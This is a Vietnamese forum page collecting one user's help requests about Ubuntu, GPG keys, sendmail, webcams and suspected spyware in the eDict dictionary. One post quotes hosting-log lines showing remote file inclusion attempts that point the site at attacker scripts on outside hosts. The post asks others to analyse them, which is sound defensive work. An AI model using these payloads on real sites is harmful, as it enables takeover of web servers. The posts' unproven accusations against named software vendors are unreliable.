banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: superthin  XML
Profile for superthin Messages posted by superthin [ number of posts not being displayed on this page: 0 ]
 
Có phải ý của blackworm1991 là muốn có một bản Apache2 (tức Apache HTTPD, không phải Apache Tomcat) dạng portable như kiểu các phần mềm portable bên Windows? Nghĩa là nó chứa tất cả file binary, configure, docs,... trong một thư mục, khi cần xài thì cứ chép ra mà mang đi đâu thì đi rồi gõ lệnh cho nó start lên và dùng? Cùng lắm là sửa lại một số đoạn trong file config để phù hợp với đường dẫn, môi trường máy mà ta vừa chép đến?

Nếu đúng là blackworm1991 mong muốn như mình mô tả thì e rằng cái tư tưởng đó là của người dùng Windows mang sang, không phải người dùng Linux, các ứng dụng có độ phức tạp như Apache2 ít ai làm như vậy. Minh khuyên blackworm1991 nên quên ý định đó đi, vì ứng dụng Linux đa phần nguồn mở, nếu ta không sử dụng cái gói cài có sẵn kiểu rpm, deb hoặc các tool như apt, yum thì con đường còn lại là tải nguồn về compile. Và ta có thể dùng nguồn này mang đi deploy ở các máy khác nhau. Chuyện dùng Portable kiểu như bên Windows là phiền phức nhiều hơn tiện lợi.
Cám ơn các bạn đã giới thiệu những phần mềm để tìm hiểu các gói tin. Có lẽ là phải vất vả nhiều để xem thử gói tin bắt được liệu có được mã hoá trước khi gửi đi hay không, nó mà được mã hoá nữa thì có lẽ là nên cài lại máy mà dùng thôi, hiện nay đang thử taskkill mà giết nó không thành công phải thêm nhiều cái tham số lằng ngoằng nữa mới kill được edict.exe, hơi rợn người rồi đây.
Có cùng thắc mắc như conmale.

Có lẽ core2x, hachoa59 hoặc là đùa kiểu đá đểu người hỏi hoặc là chả hiểu biết quái quỉ gì về cách thức mạng hoạt động. Người hỏi cũng không rõ là nắm được các thông số về mạng của người dùng cách nào, nếu anh ta là người của ISP và là người cấu hình cái modem ADSL thì không bàn, chứ còn nếu là một người làm web và "mình chỉ biết IP đó dùng mạng VPN,online bằng trình duyệt nào và vào thời gian nào thôi" thì làm thế quái nào lấy được MAC của người dùng? Có lấy được làm sao chắc được nó là MAC cứng và không thay đổi?
Chào mọi người,

BKAV có truyền thống (tuy chưa ai dám đứng ra chứng minh một cách tường minh nhưng trong giới bảo mật đều có những phân tích thể hiện điều ấy) theo dõi người dùng và điều này là cực kỳ nguy hiểm cho những ai sử dụng sản phẩm của họ. Họ lại không có tuyên bố cam kết nào về dữ liệu người dùng khi dùng sản phẩm của họ theo như cách mà các sản phẩm bảo mật nước ngoài thường làm. (Điều này cho thấy họ khó có cửa ra được thế giới như bao sản phẩm bảo mật khác đến từ Trung Quốc dù có thể làm mưa làm gió trên thị trường nội địa).

Hôm nay, mình sử dụng phần mềm eDict bản miễn phí theo như ở đây http://www.edict.vn, trong quá trình sử dụng thấy có một số biểu hiện đáng ngờ nhưng không rành về sử dụng các công cụ giám sát mạng, theo dõi các gói tin,... nên không biết cụ thể nó làm gì. Mong các bạn sử dụng tốt các công cụ này thử bắt gói tin xem giúp nó gửi cái gì trong đó?

Các nghi ngờ:

1. Phần mềm eDict hành xử không giống các phần mềm khác là không có chức năng để chọn cập nhật theo chế độ tự động/ cập nhật bằng tay / có cảnh báo khi có phiên bản mới như thường thấy ở các phần mềm khác (của M$, Adobe, Google,...), đang dùng tự nhiên thấy nháy nháy cửa sổ bảo cập nhật rồi tự thoát khỏi khay hệ thống sau đó cập nhật gì đó rồi chạy lại.

2. Khi sử dụng các thao tác liên quan đến mật khẩu, dù đã tắt hết các chức năng tra từ thì eDict vẫn cứ... mình không biết nói thế nào nhưng có những biểu hiện mà khiến mình hiểu rằng eDict dòm ngó vào clipboard và không lâu sau đó lại có hành động như là cập nhật/ gửi nhận gói tin chi đó.

3. Không thấy bất cứ một tuyên bố nào về Privacy policy trong phần mềm dù việc cập nhật là hoạt động theo kiểu client - server nghĩa là có gửi nhận thông tin từ máy người dùng lên server của nhà cung cấp eDict. Người dùng sẽ không biết thế nào.

-----
Các bạn kiểm tra và cho lời khuyên giúp là có nên sử dụng phần mềm này? Liệu có đủ an toàn để đánh đổi giữa khả năng tra từ & dịch khá ổn với việc rò rỉ thông tin cá nhân?

Cám ơn các bạn về những lời khuyên chân thành!
Lý do là bạn... chưa học bò đã lo học chạy nên nó như vậy đó smilie , cần phải học về MS DOS cho dù nó có xưa cũ và bị người ta quên lãng. Để chứng minh một bài toán thuộc hàng siêu khủng khiếp, người ta vẫn cần phải học 4 phép tính cơ bản cơ mà. Đùa tí đừng giận nhé.

CON là tên một thiết bị từ thời MS DOS, có lẽ là nó để chỉ màn hình / thiết bị xuất chuẩn. Windows sau này vì khởi thủy từ MS DOS và hỗ trợ tương thích ngược nên cũng tránh các tên thiết bị này ra.

Không chỉ có CON không đâu, các tên sau cũng không thể sử dụng: PRN, LPT1. COM1, COM2,... để đặt tên cho thư mục / file trên máy tính.

quanta wrote:

Ừ, ý anh là muốn bàn thêm về key fingerprint, long key ID, normal key ID và lưu ý cách import key ID cho mỗi distro ấy mà. 

Tại sao lại phải rối rắm thế nhỉ? Mình không rõ mấy cái key này dùng để làm gì? Nó có giống chìa khỏa mở cửa nhà chúng ta chăng? Không lẽ mỗi một server trên mạng là một cái cửa / két sắt à, và chúng ta cứ phải kiểm chìa khóa tra vào để mở? Sao người ta không dùng đơn giản như các trạm Anonymous FTP cho tiện nhỉ? Các bạn giải thích giúp nào.
Nó ra như sau:

Code:
superthin@superthin-desktop:~$ gpg --keyserver hkp://subkeys.pgp.net --recv-keys 6E80C6B7
gpg: requesting key 6E80C6B7 from hkp server subkeys.pgp.net
gpg: key 6E80C6B7: public key "Launchpad PPA for Banshee Team" imported
gpg: no ultimately trusted keys found
gpg: Total number processed: 1
gpg: imported: 1 (RSA: 1)

Có phải đã thành công rồi phải không quanta. Đa tạ đồng chí nhé smilie

quanta wrote:

Bạn thử lại với:
Code:
gpg --keyserver hkp://subkeys.pgp.net --recv-keys 6E80C6B7

 

Nó lại sinh ra lỗi như sau:

Code:
superthin@superthin-desktop:~$ sudo gpg --keyserver hkp://subkeys.pgp.net --recv-keys 6E80C6B7
gpg: WARNING: unsafe ownership on configuration file `/home/superthin/.gnupg/gpg.conf'
gpg: external program calls are disabled due to unsafe options file permissions
gpg: keyserver communications error: general error
gpg: keyserver receive failed: general error
superthin@superthin-desktop:~$


Tiếp tục giúp mình quanta nhé smilie

Àh, bổ sung thêm tí, đoạn này do tự mình sáng tác khi cố mò mẫm trên mạng:

Mình vào: http://mirror-fpt-telecom.fpt.net/ubuntu/project/ để lấy file ubuntu-archive-keyring.gpg
hay nói đúng hơn là làm một cú:
Code:
superthin@superthin-desktop:~$ wget http://mirror-fpt-telecom.fpt.net/ubuntu/project/ubuntu-archive-keyring.gpg

Và rồi thêm một cú:
Code:
superthin@superthin-desktop:~$ sudo apt-key add ubuntu-archive-keyring.gpg

Máy trả lời hai chữ ngắn gọn: OK
Không rõ là đã OK chưa nữa. Bây giờ không nghĩ ra cái gì để mà update hay apt-get install để thử nghiệm thử xem vì các phần mềm cài đầy, đã đáp ứng nhu cầu rồi. Đợi vài ngày khi có dịp nghịch tiếp, sẽ báo cáo kết quả thêm.

Mời quanta nhận xét và bổ sung.

quanta wrote:
Code:
gpg --keyserver hkp://subkeys.pgp.net --recv-keys 4874D3686E80C6B7
gpg --armor --export 4874D3686E80C6B7 | sudo apt-key add -
 

Bạn quanta ơi, làm ơn chỉ mình cho trót đi nào. Mình thực hiện như bạn bảo, nguyên ở terminal như sau:

Code:
superthin@superthin-desktop:~$ sudo gpg --keyserver hkp://subkeys.pgp.net --recv-keys 4874D3686E80C6B7
[sudo] password for superthin:
gpg: WARNING: unsafe ownership on configuration file `/home/superthin/.gnupg/gpg.conf'
gpg: keyring `/home/superthin/.gnupg/secring.gpg' created
gpg: keyring `/home/superthin/.gnupg/pubring.gpg' created
gpg: external program calls are disabled due to unsafe options file permissions
gpg: keyserver communications error: general error
gpg: keyserver receive failed: general error
superthin@superthin-desktop:~$ sudo gpg --armor --export 4874D3686E80C6B7 | sudo apt-key add -
gpg: WARNING: unsafe ownership on configuration file `/home/superthin/.gnupg/gpg.conf'
gpg: WARNING: nothing exported
gpg: no valid OpenPGP data found.
superthin@superthin-desktop:~$


Bây giờ mình phải làm gì tiếp theo đây. Nói chung là bó tay rồi. Hiện đang vẫn phải dùng một repository ở tận Đài Loan.

Cám ơn bạn đã gỡ rối giúp.
Chào các bạn,

Từ Ubuntu hẳn repository là rất quan trọng. Thiếu chúng có lẽ nhiều người trong chúng ta sẽ sớm bỏ cuộc vì việc đi gom góp phần mềm cho Linux ở đâu về để cài vào Ubuntu chẳng phải là việc dễ thực hiện với người mới bắt đầu làm quen Linux.

Tuy nhiên, ở Việt Nam chỉ có 2 đơn vị cung cấp Ubuntu repository - chất lượng quá... hẻo:

1. http://www.openlab-hcm.org: cái này chết lên chết xuống, dường như dạo này bỏ hoang hay sao ấy, không dùng được nữa.

2. http://mirror-fpt-telecom.fpt.net: cái này thì dùng trình duyệt vào theo dạng duyệt cây thư mục tải vài phần mềm nguồn mở khá nhanh, chất lượng tạm bởi không tìm thấy file nào thì thôi, tìm thấy chắn chắn tải về thành công.

Nhưng chức năng Ubuntu repository của FPT quả là đáng chán, cứ hay bị lỗi:

W: GPG error: http://mirror-fpt-telecom.fpt.net hardy Release: The following signatures were invalid: BADSIG 40976EAF437D05B5 Ubuntu Archive Automatic Signing Key <ftpmaster@ubuntu.com>
W: GPG error: http://ppa.launchpad.net hardy Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 4874D3686E80C6B7
 


Có lẽ nhiều bạn ở đây cũng gặp phiền phức này và chúng ta đành phải sử dụng ké repository ở nước khác smilie tốc độ chậm hơn và phải coi đồng hồ để chờ lúc thấp điểm mà tải. Quả là nhiêu khê và mệt mỏi.

Tìm cách liên hệ với người quản lý server để hỏi thì có vài địa chỉ email nhưng không thấy ai trả lời.

Các bạn ơi, tự chúng ta giải quyết được lỗi GPG kia không? Hay là phải nhờ đến FPT?


Nhờ các bạn chỉ giúp cách khắc phục . Xin chân thành cám ơn!

PXMMRF wrote:

Webserver hosting website của bạn chạy Windows và cài PHP 5 phải không?
À nếu muốn cho "nó" load file PHP về máy nó thì bạn phải đăt file ở chỗ này chứ , thí dụ C:/Program Files/"PHP file" (khi webserver chay Windows).  


Có lẽ không phải host chạy Windows, mình cũng chả rành khoản này đâu, nhưng không cho rằng host chạy với Windows, PHP5 thì đúng, nhưng LINUX hay BSD gì ấy vì khi upload vài file lên thì nó phân biệt tên file chữ thường và CHỮ HOA => có lẽ không phải Windows.

Xin hỏi thêm, là nếu thằng kẻ khai thác thông tin kia lấy thông tin thì nó sẽ lấy được thông tin gì của mình? Liệu nó có lấy được mật khẩu hoặc cái gì ấy mà đủ thông tin để lợi dụng thông tin có được ấy gây hại cho trang web?
Ùi, conmale ơi, mình chả biết quái quỉ gì về bảo mật đâu, không biết tí nào. Cài đặt một diễn đàn viết bằng PHP dạng dễ như punBB mà còn thất bại nữa là. Chẳng qua là thằng bạn nó có một shared host có sẵn cái diễn đàn mà ngày trước nó được ai đó tặng không có thời gian rảnh nên tặng lại, và chủ yếu là vào viết bài thôi. Cho nên bác bảo đọc cái file txt kia thì smilie chịu, chỉ hiểu rằng dường như nó là một thứ ngôn ngữ lập trình, còn nó là ngôn ngữ gì, có ý định làm gì thì... bó tay cả.

Làm ơn phân tích và báo cáo giúp xem vấn đề là người ta đã âm thầm kiểm soát toàn bộ trang web của mình hay chưa?

Xin cám ơn!
Thành thật xin lỗi Mr. Khoai nhé. Chả là đêm qua trời nóng quá nên quên mất là mình đang ở trần, cứ thế mà chộp screenshot và gửi lên, hoàn toàn không có ý định "khoe hàng" hoặc là gửi ảnh phản cảm lên diễn đàn. Lần sau có post hình mình sẽ cân nhắc hơn.
Cuối cùng thì cũng đã GYachE thành công, chỉ mỗi tội webcam không chỉnh gì mà nó sáng quá nhiều so với hồi còn dùng Windows, chỉ cần chỉnh tối đi là ngon lành. Và không còn lý do gì để nghĩ đến Windows nữa cả. Trên đĩa đã tẩy sạch những gì liên quan đến Windows và FAT32, NTFS luôn rồi.

[img][/img]
Minh họa dùng Webcam trong Ubuntu. SuperThin đang ngồi tán phét với gái qua mạng và khoe thân hình La Hán của hắn
Tình hình là hôm nay vào DirectAdmin để xem nguyên nhân vì sao mà ảnh nền trang web không thể nạp lên được dù HTML đúng path, test thử trên localhost và host khác OK. Mới phát hiện ra rằng có hai dòng rất khả nghi:

Code:
tên miền/include_once.php?include_file=http://www.moppedtreffen.de/icon/id.txt??




Code:
http://69amigas.com/chat/chat/localization/spanish/echo.txt???


Nhìn địa chỉ IP truy cập thì thấy hai câu trên đều xuất phát từ một địa chỉ IP ở nước ngoài. Nhờ các bạn khảo sát giúp xem hai cái câu lệnh kia thể hiện người ta định bày trò gì? Liệu có nguy hiểm đến trang web của mình?

Để cho chắc ăn, trên host mình hiện giờ không có file include_once.php bằng PHP script nhưng mình upload lên 1 file có dung lượng 400MB và là file phim .avi đổi tên thành include_once.php để cho hacker nghịch cho vui smilie

Chân thành cám ơn!

MrTux wrote:
Mình nhấn login nó báo Firewall thế là móm luôn ! 

Cái đó thực ra là một trang web làm bằng Flash, giả lập như một hệ điều hành *nix mini để cho chúng ta rèn luyện kỹ năng gõ lệnh và coding như một cuộc thi thố, ai giỏi thì lên bản vàng. Nói chung là nó giống một máy tính chạy *nix đang bị sự cố / còn quá nghèo nàn phần mềm, bây giờ nhiệm vụ của ta là loay hoay với nó.

Vì vậy, tường lửa gì ấy là do trang web kia thông báo thôi, không có liên quan gì tường lửa trên máy thật của bạn đâu.

Hy vọng các cao thủ vào nghịch thử, mình là newbie nên chỉ mới thử gõ vài lệnh ls để xem cấu trúc thư mục thôi. À, mà nó không hỗ trợ phím tab nhắc câu lệnh nên chúng ta cũng hơi vất vả khi nghịch smilie
Hôm nay lên mạng tìm vài bài viết hướng dẫn sử dụng lệnh trong Linux, vô tình nghịch được cái này: http://www.welcometothelist.com/ . Đây là trang để những ai là tín đồ của Linux + dòng lệnh rèn luyện. Nó tổ chức như một game. Khi vào trang web http://www.welcometothelist.com thì một cửa sổ đánh lệnh Linux hiện lên, và anh em Linux phải tự xoay xở với những lệnh Linux mà mình từng học hoặc sưu tầm ở đâu đó.

Mình vào và chưa biết phải làm gì, vì còn quá là newbie.

Các bạn cao thủ ở đây vào thử sức và cho biết kết quả là các bạn chơi game được tới màn mấy nhé.

quanta wrote:

Có phải tương tự như này không: http://www.telscom.ch/index.php/downloads/streaming_from_webcam_with_vlc_on_linux
 

Gần gần như vậy quanta à, nhưng mình chỉ muốn một cái mini stream server mà thôi, chạy được trong GNOME hoặc KDE chứ không dạng server như kiểu chuyên dụng phục vụ phim online. Hy vọng là có sẵn một phần mềm nào đó chỉ cần cài nó vào là nó lấy tín hiệu từ webcam và gửi lên một trang web để ta có thể chia cho người khác xem. Bên thế giới Windows ngày trước mình không thể cho xem webcam qua Yahoo! được vì cứ bị lỗi "Don't send" làm crash Yahoo! nên đã cài một phần mềm và chia sẻ webcam với bạn bè qua trang web, khi chát với ai thì copy URL trang web của ta thảy cho họ là họ xem ngon lành.
Code:
$ sudo sh -x /etc/init.d/sendmail start

Chạy lệnh trên, ra "đám rừng" sau đây (mình không đủ trình độ để hiểu nó nói gì.
Code:
superthin@superthin-desktop:~$ sudo sh -x /etc/init.d/sendmail start
+ PATH=/bin:/usr/bin:/sbin:/usr/sbin
+ DESC=Mail Transport Agent (MTA)
+ NAME=sendmail
+ DAEMON=/usr/sbin/sendmail
+ DAEMON_ARGS=
+ SCRIPTNAME=/etc/init.d/sendmail
+ [ -x /usr/sbin/sendmail ]
+ [ -r /etc/default/sendmail ]
+ . /lib/init/vars.sh
+ [ -f /etc/default/rcS ]
+ . /etc/default/rcS
+ TMPTIME=0
+ SULOGIN=no
+ DELAYLOGIN=no
+ UTC=no
+ VERBOSE=no
+ FSCKFIX=no
+ [ ]
+ true
+ . /lib/lsb/init-functions
+ FANCYTTY=
+ [ -e /etc/lsb-base-logging.sh ]
+ . /etc/lsb-base-logging.sh
+ DEBUG=0
+ [ -z /usr/sbin/sendmail ]
+ set -e
+ [ -z ]
+ Get_Parameters
+ DAEMON_MODE=Daemon
+ DAEMON_PARMS=
+ DAEMON_UID=root
+ QUEUE_MODE=Daemon
+ QUEUE_INTERVAL=10m
+ QUEUE_PARMS=
+ MSP_MODE=Daemon
+ MSP_INTERVAL=10m
+ MSP_PARMS=
+ MISC_PARMS=
+ CRON_PARMS=
+ LOG_CMDS=No
+ SENDMAIL_ROOT=/var/run/sendmail
+ MTA_DAEMON=/usr/sbin/sendmail-mta
+ MTA_COMMAND=/usr/sbin/sendmail-mta
+ MTA_A=-Am
+ MTAL_L=-L sm-mta
+ MTAL_L_QUEUE=-L sm-mta-queue
+ MTAL_L_RUNQ=-L sm-mta-runq
+ MTA_ROOT=/var/run/sendmail/mta
+ MTAL_PIDFILE=/var/run/sendmail/mta/sendmail.pid
+ MTAL_SOCKET=/var/run/sendmail/mta/smsocket
+ MTAL_CNTL=/var/run/sendmail/mta/smcontrol
+ MTAQ_L=-L sm-que
+ MTAQ_L_RUNQ=-L sm-que-runq
+ MTAQ_PIDFILE=/var/run/sendmail/mta/queue.pid
+ MTAQ_SOCKET=/var/run/sendmail/mta/qusocket
+ MTAQ_CNTL=/var/run/sendmail/mta/qucontrol
+ MSP_DAEMON=/usr/sbin/sendmail-msp
+ MSP_COMMAND=/usr/sbin/sendmail-msp
+ MSP_A=-Ac
+ MSP_L=-L sm-msp
+ MSP_L_QUEUE=-L sm-msp-queue
+ MSP_ROOT=/var/run/sendmail/msp
+ MSP_PIDFILE=/var/run/sendmail/msp/sendmail.pid
+ MSP_SOCKET=/var/run/sendmail/msp/smsocket
+ MSP_CNTL=/var/run/sendmail/msp/smcontrol
+ [ -f /etc/mail/sendmail.conf ]
+ . /etc/mail/sendmail.conf
+ DAEMON_NETMODE=Static
+ DAEMON_NETIF=eth0
+ DAEMON_MODE=Daemon
+ DAEMON_PARMS=
+ DAEMON_HOSTSTATS=No
+ DAEMON_MAILSTATS=No
+ QUEUE_MODE=Daemon
+ QUEUE_INTERVAL=10m
+ QUEUE_PARMS=
+ MSP_MODE=Cron
+ MSP_INTERVAL=20m
+ MSP_PARMS=
+ MSP_MAILSTATS=No
+ MISC_PARMS=
+ CRON_MAILTO=root
+ CRON_PARMS=
+ LOG_CMDS=No
+ HANDS_OFF=No
+ AGE_DATA=
+ DAEMON_RUNASUSER=No
+ DAEMON_STATS=No
+ MSP_STATS=No
+ SM_Get_Parameters=yes
+ PATH=/bin:/usr/bin:/sbin:/usr/sbin
+ STAMP_DIR=/var/run/sendmail/stampdir
+ START_MTAL_CMD=start-stop-daemon --pidfile /var/run/sendmail/mta/sendmail.pid --exec /usr/sbin/sendmail-mta --startas /usr/sbin/sendmail-mta --start
+ STOP_MTAL_CMD=start-stop-daemon --pidfile /var/run/sendmail/mta/sendmail.pid --name sendmail-mta --stop
+ SIGNAL_MTAL_CMD=start-stop-daemon --pidfile /var/run/sendmail/mta/sendmail.pid --name sendmail-mta --stop
+ START_MTAQ_CMD=start-stop-daemon --pidfile /var/run/sendmail/mta/queue.pid --make-pidfile --exec /usr/sbin/sendmail-mta --startas /usr/sbin/sendmail-mta --start
+ STOP_MTAQ_CMD=start-stop-daemon --pidfile /var/run/sendmail/mta/queue.pid --name sendmail-mta --stop
+ SIGNAL_MTAQ_CMD=start-stop-daemon --pidfile /var/run/sendmail/mta/queue.pid --name sendmail-mta --stop
+ START_MSP_CMD=start-stop-daemon --pidfile /var/run/sendmail/msp/sendmail.pid --exec /usr/sbin/sendmail-msp --startas /usr/sbin/sendmail-msp --chuid smmsp --start
+ STOP_MSP_CMD=start-stop-daemon --pidfile /var/run/sendmail/msp/sendmail.pid --name sendmail-msp --stop
+ SIGNAL_MSP_CMD=start-stop-daemon --pidfile /var/run/sendmail/msp/sendmail.pid --name sendmail-msp --stop
+ NAME=sendmail
+ FLAGS=defaults 50
+ echo Daemon
+ tr [:upper:] [:lower:]
+ DAEMON_MODE=daemon
+ echo Daemon
+ tr [:upper:] [:lower:]
+ QUEUE_MODE=daemon
+ echo Cron
+ tr [:upper:] [:lower:]
+ MSP_MODE=cron
+ [ daemon = daemon -a ( ( daemon = cron -o daemon = none ) -o ( daemon != cron -a daemon != none -a = ) ) ]
+ SPLIT_DAEMON=0
+ [ ! -f /usr/share/sendmail/cf/feature/msp.m4 ]
+ [ No = Yes ]
+ basename /etc/init.d/sendmail
+ :
+ log_daemon_msg Starting Mail Transport Agent (MTA) sendmail
+ [ -z Starting Mail Transport Agent (MTA) ]
+ log_use_usplash
+ [ n = y ]
+ type usplash_write
+ usplash_write TEXT Starting Mail Transport Agent (MTA) sendmail
+ log_to_console log_daemon_msg Starting Mail Transport Agent (MTA) sendmail
+ [ n != y ]
+ [ no != yes ]
+ readlink /proc/self/fd/0
+ stdin=/dev/pts/0
+ [ /dev/pts/0 != /dev/pts/0 ]
+ return 0
+ log_use_fancy_output
+ TPUT=/usr/bin/tput
+ EXPR=/usr/bin/expr
+ [ xxterm != xdumb ]
+ [ -x /usr/bin/tput ]
+ [ -x /usr/bin/expr ]
+ /usr/bin/tput hpa 60
+ /usr/bin/tput setaf 1
+ [ -z ]
+ FANCYTTY=1
+ true
+ /usr/bin/tput xenl
+ /usr/bin/tput cols
+ COLS=80
+ [ 80 ]
+ [ 80 -gt 6 ]
+ /usr/bin/expr 80 - 7
+ COL=73
+ printf * Starting Mail Transport Agent (MTA) sendmail
* Starting Mail Transport Agent (MTA) sendmail + /usr/bin/expr 80 - 1
+ /usr/bin/tput hpa 79
+ printf
+ start_sendmail
+ local result
+ make_databases
+ test -x /usr/bin/make -a -f /etc/mail/Makefile
+ /usr/bin/make all -s -C /etc/mail
+ result=0
+ start_mta
+ local result
+ result=0
+ check_dirs
+ [ ! -d /var/run/sendmail ]
+ [ ! -d /var/run/sendmail/mta ]
+ [ ! -d /var/run/sendmail/msp ]
+ [ ! -d /var/run/sendmail/stampdir ]
+ is_running mta
+ local result
+ result=1
+ check_dirs
+ [ ! -d /var/run/sendmail ]
+ [ ! -d /var/run/sendmail/mta ]
+ [ ! -d /var/run/sendmail/msp ]
+ [ ! -d /var/run/sendmail/stampdir ]
+ echo mta
+ tr [:upper:] [:lower:]
+ who=mta
+ PIDFILE=/var/run/sendmail/mta/sendmail.pid
+ [ -s /var/run/sendmail/mta/sendmail.pid ]
+ head -n 1 /var/run/sendmail/mta/sendmail.pid
+ PID=6597
+ tail -n 1 /var/run/sendmail/mta/sendmail.pid
+ COMMAND=/usr/sbin/sendmail-mta -Am -L sm-mta -bd -q10m
+ ps --no-heading 6597
+ [ ! -z 6597 ? Ss 0:00 sendmail: MTA: accepting connections ]
+ result=0
+ return 0
+ log_warning_msg MTA is already running.
+ log_use_usplash
+ [ n = y ]
+ type usplash_write
+ usplash_write STATUS MTA is already running.
+ log_to_console log_warning_msg MTA is already running.
+ [ n != y ]
+ [ no != yes ]
+ readlink /proc/self/fd/0
+ stdin=/dev/pts/0
+ [ /dev/pts/0 != /dev/pts/0 ]
+ return 0
+ log_use_fancy_output
+ TPUT=/usr/bin/tput
+ EXPR=/usr/bin/expr
+ [ xxterm != xdumb ]
+ [ -x /usr/bin/tput ]
+ [ -x /usr/bin/expr ]
+ /usr/bin/tput hpa 60
+ /usr/bin/tput setaf 1
+ [ -z 1 ]
+ true
+ true
+ /usr/bin/tput setaf 3
+ YELLOW=
+ /usr/bin/tput op
+ NORMAL=
+ echo * MTA is already running.
* MTA is already running.
+ return 1
+ result=1
+ check_msp
+ local result
+ result=1
+ [ ! -f /usr/share/sendmail/cf/feature/msp.m4 ]
+ [ -s /etc/mail/submit.cf ]
+ [ -s /etc/mail/submit.mc ]
+ grep -qEe ^[[:space:]]*`?FEATURE\([[:space:]]*`?msp /etc/mail/submit.mc
+ result=0
+ return 0
+ start_msp
+ local result
+ result=0
+ check_dirs
+ [ ! -d /var/run/sendmail ]
+ [ ! -d /var/run/sendmail/mta ]
+ [ ! -d /var/run/sendmail/msp ]
+ [ ! -d /var/run/sendmail/stampdir ]
+ is_running msp
+ local result
+ result=1
+ check_dirs
+ [ ! -d /var/run/sendmail ]
+ [ ! -d /var/run/sendmail/mta ]
+ [ ! -d /var/run/sendmail/msp ]
+ [ ! -d /var/run/sendmail/stampdir ]
+ echo msp
+ tr [:upper:] [:lower:]
+ who=msp
+ PIDFILE=/var/run/sendmail/msp/sendmail.pid
+ [ -s /var/run/sendmail/msp/sendmail.pid ]
+ return 1
+ check_msp
+ local result
+ result=1
+ [ ! -f /usr/share/sendmail/cf/feature/msp.m4 ]
+ [ -s /etc/mail/submit.cf ]
+ [ -s /etc/mail/submit.mc ]
+ grep -qEe ^[[:space:]]*`?FEATURE\([[:space:]]*`?msp /etc/mail/submit.mc
+ result=0
+ return 0
+ [ cron != daemon ]
+ return 0
+ return 1


Bạn tìm hiểu file /etc/hosts chưa? Có thu được gì không? Thảy nội dung của nó lên đây.  

Thu được đoạn sau:
Code:
127.0.0.1 localhost localhost.localdomain localhost
127.0.1.1 superthin-desktop
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts

Mình cũng không hiểu tí gì về đoạn trên.

thì nó vẫn phải hiện lên các thông tin start dịch vụ chứ nhỉ 

Không thấy có dịch vụ nào chạy, tất cả đều nằm bên dưới (đằng sau) màn hình có cái thanh màu vàng cam hay cà phê sữa chạy qua chạy lại, không có một dòng text nào hiện lên (tức là trước khi cài sendmail ấy. Trừ khi bị cúp điện vào phiên làm việc trước thì mới thấy cá dòng text, có lẽ là lúc hiện text nghĩa là có chút vấn đề nào đó không ổn chăng?

Tình hình là bây giờ không dám chạy đoạn script liên quan đến hàm mail() nữa, upload lên host test vài chục lần thì bị bên cho thuê hosting cảnh báo là đang spam, và họ sẽ vô hiệu hóa hàm mail() nếu còn tiếp diễn => buồn thối ruột.

Quanta tiếp tục giúp sức gỡ đống lùm nhìm trên với nhé. Nếu không có cách làm nào cho sendmail hơn vì bản chất nó là chậm mà không phải do bug hay error thì các bạn đề nghị giúp cho một chương trình có cùng tính năng mà tốc độ nhanh hơn.

Cám ơn, cám ơn các bạn rất nhiều.
Sorry quanta nhé. Nói chung là có những chỗ không biết dịch ra tiếng Việt là như thế nào. Hiểu lờ mờ như vậy thôi. À, xin đính chính là IP động, chứ không phải IP tĩnh, chưa có tiền để đăng ký cái IP tĩnh cho máy ở nhà, đăng ký mất vài chục triệu đồng một năm thì đau quá, không chơi nổi.

Về cái vụ không nhảy vào text thì nhảy vào đâu đấy. Ý mình là, trước khi cài sendmail thì màn hình splash có cái thanh chạy qua chạy lại trùm lên toàn bộ quá trình khởi động, những thông báo mà cuối câu có chữ OK không hiện lên, nghĩa là giống bên Windows XP chạy chế độ normal ấy, nhưng giờ thì sau vài giây cái thanh trượt chạy qua chạy lại thì hàng loạt dòng với OK cuối dòng hiện lên, đến chỗ load sendmail thì vài phút mới xong và sau đó mới hiện lên màn hình graphic có ô đăng nhập.

Nào quanta và Mr. Khoai tiếp sức mình tiếp nhé. Vẫn chưa làm cho máy nhanh hơn được. Cách tắt sendmail nạp lúc khởi động thỉ chỉ tiết kiệm thời gian khi khởi động máy thôi, khi chạy nó thì cũng nạp chậm và phải đợi trước khi dùng PHP, tổng thời gian vẫn không đổi. Mình muốn nhanh hơn kia. Àh, xem debug nguyên nhân gây chậm ở đâu quanta nhỉ?
Chào các bạn,

Mình đã cài Apache, MySQL, PHP theo gói LAMP trong tasksel cho Ubuntu destop của mình. Test thử một vài script viết bằng PHP thấy hoạt động tốt.

Lên mạng lấy về một script để tập tành học coding với PHP. Rồi thì cũng cài được sendmail để script hoạt động đúng chức năng (gửi thư thông báo khi có khách ghi số lưu niệm ấy) nhưng hoạt động của sendmail gây ra hai vấn đề sau:

- Khởi động máy tự nhiên quá chậm, sau màn splash hiện lên, tự nhiên nhảy qua màn hình text hiển thị dòng sendmail nạp: cái này quá chậm, có khi mất gần 5 phút. Như vậy thì khởi động máy là kinh khủng khiếp.

- Khi gửi email bằng hàm mail() trong PHP thì email gửi được, nhưng thời gian chạy file script có gọi lệnh mail() là quá lâu, có khi đến những 30 giây hoặc lâu hơn, mà email hoàn toàn chỉ là một đoạn văn bản chừng 3-5 câu, không có gì đình kèm, không chứa HTML mà chỉ plain text.

Đã lên mạng tìm kiếm người ta bảo là do ta xài IP tĩnh và không thực sự domain chất lượng gì ấy như những server nên sendmail hoạt động chậm. Mình đọc và làm theo như thêm -t như tham số vào trong hàm mail() như hướng dẫn trên một số trang vẫn không cải thiện tình hình.

Xin nhờ các cao thủ võ lâm ở đây tiếp sức với. Chân thành cám ơn các bạn.
Tình hình là hôm qua chát chít với một người bạn và người ấy lâu rồi không gặp, đề nghị chia sẻ webcam. Dĩ nhiên là với cái Pidgin thì thua rồi. Tìm trên mạng thì thấy Yahoo! Messenger có bản dùng cho Linux nhưng khá cũ, có lẽ không hỗ trợ webcam.

Giờ thì lại nhờ vả các cao thủ *nix ở đây:

- Webcam tên là Diboom, loại rẻ tiền ấy, mất driver của Windows luôn rồi. Giờ thì Ubuntu không thấy nó khi gắn vào cổng USB, nghĩa là một cục sắt chơi.

- Muốn tìm một driver cho nó, nếu không có chính xác thì dạng generic hơi giật hình cũng OK.

